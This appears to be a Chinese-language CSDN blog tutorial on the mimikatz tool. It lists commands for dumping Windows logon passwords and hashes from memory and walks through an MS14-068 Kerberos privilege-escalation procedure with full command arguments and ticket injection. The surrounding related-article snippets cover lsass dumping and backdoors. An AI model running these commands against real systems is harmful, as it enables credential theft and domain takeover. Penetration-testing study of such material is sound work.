mimikatz的使用

最新推荐文章于 2024-05-31 16:35:55 发布
最新推荐文章于 2024-05-31 16:35:55 发布
阅读量1.1k 收藏 4
点赞数 1
分类专栏: 工具 文章标签: 安全 mimikatz
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48985780/article/details/121950765
版权

mimikatz的使用

简介:

mimikatz,很多人称之为密码抓取神器,但在内网渗透中,远不止这么简单

测试过程:

常见命令:

cls-----------------------------清屏
exit----------------------------退出
version------------查看mimikatz的版本
system::user-----查看当前登录的系统用户
system::computer-------查看计算机名称
process::list------------------列出进程
process::suspend 进程名称 -----暂停进程
process::stop 进程名称---------结束进程
process::modules --列出系统的核心模块及所在位置
service::list---------------列出系统的服务
service::remove-----------移除系统的服务
service::start stop 服务名称--启动或停止服务
privilege::list---------------列出权限列表
privilege::enable--------激活一个或多个权限
privilege::debug-----------------提升权限
nogpo::cmd------------打开系统的cmd.exe
nogpo::regedit -----------打开系统的注册表
nogpo::taskmgr-------------打开任务管理器
ts::sessions-----------------显示当前的会话
ts::processes------显示进程和对应的pid情况等
sekurlsa::wdigest-----获取本地用户信息及密码
sekurlsa::tspkg------获取tspkg用户信息及密码
sekurlsa::msv   抓取hash
sekurlsa::logonPasswords--获登陆用户信息及密码
sekurlsa::ekeys  抓取hash

获取本机信息:

mimikatz:

privilege::debug

sekurlsa::logonpasswords

 

 

MS14-068提权:

MS14-068编号CVE-2014-6324,补丁为3011780
我的域控是win2012 R2,没有利用成功,但是win2008 R2是可以的
后来查了下,貌似影响版本从win2000-win2012(不包括win2012)

使用MS14-068.exe

MS14-068.exe -u test@test.com -s S-1-5-21-1528753600-3951244198-520479113-1107 -d 192.168.93.10 -p 123!@#qwe      #其中-s 用whoami /all查看  输入的是域用户的账号密码,同时注意不能忽略掉sid后面几位,和黄金票据不太一样
 

klist purge #删除所有缓存票据,如果不清除,在域用户下就不能利用成功,只能在本地用户下利用成功
kerberos::purge
kerberos::list
kerberos::ptc TGT_test@test.org.ccache       #注意不是kerberos::ptt

 

抓取hash值:

 获登陆用户信息及密码:

 显示当前的会话:

 

 

xzhome
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
密码破解工具Minikatz
11-15
主要运行在本机上,用于获取本机的账号和口令,是很不错的网络安全攻防工具软件。具有类似功能的软件还有FindPass.exe,本人会同时上传。
萌新如何玩转mimikatz
m0_71745484的博客
02-13 5875
mimikatz就是我遇见的一个坎
mimkatz获取windows10明文密码
最新发布
banliyaoguai的博客
05-31 818
在Windows 10或更高版本的系统中,默认情况下,操作系统会在内存缓存中禁止保存明文密码。然后,再次使用mimikatz等工具读取lsass.exe进程的内存,即可获取到明文密码。mimikatz通过注入代码到操作系统的内存中,能够读取和解密这些由lsass.exe进程保存的加密凭证。具体的操作是,mimikatz先利用管理员权限执行一些操作,如使用procdump等工具lsass.exe进程转储成一个dmp文件。当用户登录时,lsass.exe会使用一个可逆的算法加密明文密码,并将密文保存在内存中。
内网渗透神器(Mimikatz)——使用教程
热门推荐
W小哥
04-16 6万+
一、工具简介 Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具。 二、Mimikatz命令 cls: 清屏 standard: 标准模块,基本命令 crypto: 加密相关模块 sekurlsa: 与证书相关的模块 kerberos: kerberos模块 privilege: 提权相关模块 process: 进程相关
哈希处理介绍-使用Mimikatz以及John对Windows用户密码破解
ran的博客
02-06 6645
Windows系统使用两种算法对用户的密码进行哈希处理, 它们分别是LM-hash算法和NTLMhash算法。所谓哈希(hash) , 就是使用一种加密函数对其进行加密。这个加密函数对一个任意长度的字符串数据进行一次数学加密函数运算,然后返回一个固定长度的字符串。Windows的系统密码hash默认情况下一般由两部分组成:第一部分是LM-hash, 第二部分是NTLM-hash。通常可从Windows系统中的SAM文件和域控制器的NTDS.dit文件中获得所有用户的hash。
【后渗透】Mimikatz使用大全
hacker3062的博客
10-14 1815
Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe 进程中获取当前登录系统用户名的密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而 mimikatz 正是通过对lsass逆算获取到明文密码!
mimikatz使用
mirror97black的博客
04-11 6900
mimikatz使用时需要高权限,至少是administrator权限 mimikatz抓取密码的命令需要system权限,可以先进行提权 privilege::debug //提升权限(从administrator提升到system) 抓取hash sekurlsa::logonpasswords //获取当前在线用户的明文密码(需要高权限运行) lsadump::lsa ...
[后渗透]Mimikatz使用大全1
08-03
【后渗透技术】Mimikatz使用详解 Mimikatz是一款由法国安全研究员Benjamin Delpy开发的开源工具,主要用于系统权限提升、密码获取和安全审计。它以其强大的功能在网络安全领域广受欢迎,特别是在渗透测试和红队操作...
mimikatz最新版本
11-20
`README.md`是Markdown格式的说明文档,通常会包含项目简介、使用方法、更新日志等信息,是理解mimikatz使用的关键。`kiwi_passwords.yar`可能是一个规则文件,用于特定类型的密码或哈希解析。最后,`Win32`和`x64`...
mimikatz.rar
07-08
本文将详细介绍mimikatz的功能、用途以及如何使用mimikatz的核心功能之一,就是可以从lsass.exe进程中提取Windows系统的明文密码。lsass.exe是Local Security Authority Subsystem Service的缩写,是Windows操作...
mimikatz获取系统密码
03-28
2. **法律与道德**: 使用mimikatz必须遵守当地法律法规,确保在授权的范围内进行,否则可能触犯法律。 3. **防护措施**: 对于系统管理员来说,了解mimikatz的工作原理有助于增强系统的防御策略,如限制不必要的权限...
mimikatz-master源码
07-22
mimikatz-master
mimikatz的基本使用
a3320315的博客
05-25 9786
常见命令 cls-----------------------------清屏 exit----------------------------退出 version------------查看mimikatz的版本 system::user-----查看当前登录的系统用户 system::computer-------查看计算机名称 process::list------------------列出进程 process::suspend 进程名称 -----暂停进程 process::stop 进程名称--
技术分享 | mimikatz的常见使用方法
Uguardsec的博客
08-10 3167
0x00简介 Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe 进程中获取当前登录系统用户名的密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而 mimikatz 正是通过对lsass逆算获取到明文密码!也就
mimikatz工具的介绍和基本使用
菜鸟-宇的个人博客
10-02 1351
该模块是用于提权的模块。mimikatz 很多模块需要高权限运行,因此执行高权限操作模块的时候需要先利用 privilege 模块进行提权。如下命令是用于提权的命令,只能用具有管理员权限的窗口执行该命令才能成功,普通用户权限执行该提权命令会失败。
Mimikatz介绍
#7的博客
03-26 1544
本文主要介绍了mimikatz的定义、功能模块,并对常见的功能模块进行了详细的阐述。
内网渗透系列之mimikatz使用以及后门植入
lza20001103的博客
09-04 4305
内网渗透系列之mimikatz使用以及后门植入 文章目录内网渗透系列之mimikatz使用以及后门植入前言mimikatz使用后门植入msf永久后门植入(1)Meterpreter后门:Metsvc(2)Meterpreter后门:PersistenceNC后门后记 前言 内网渗透最重要的环节就是权限维持,当我们获取到靶机的权限后,当对方的机器关机后,我们所获取的会话也会跟着消失,也就是说当他重新开启后,我们又得重新进行信息收集,漏洞利用,又重复着上一个渗透的过程,工程量就很大了。所以,为了能一直维持
内网渗透神器(Mimikatz)——使用教程,你会的还只有初级工程师的技术吗
2401_84446919的博客
04-18 1195
在域控上执行)查看域kevin.com内指定用户root的详细信息,包括NTLM哈希等。从sam.hive和system.hive文件中获得NTLM Hash。sr98: 用于SR98设备和T5577目标的RF模块。rdm: RDM(830AL)器件的射频模块。rpc: mimikatz的RPC控制。导出lsass.exe进程中所有的票据。(在域控上执行)读取所有域用户的哈希。acr: ACR模块。开启Wdigest Auth。关闭Wdigest Auth。
kali 中mimikatz使用教程
06-28
这是一个对于使用 Mimikatz 工具的教程。 Mimikatz 是一个开发者用来获取 Windows 认证凭证的工具,它可以解密 Windows 存储的密码,甚至可以获取经过 NTLM 身份验证的密码。 但请注意,使用这个工具可能会涉及到...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值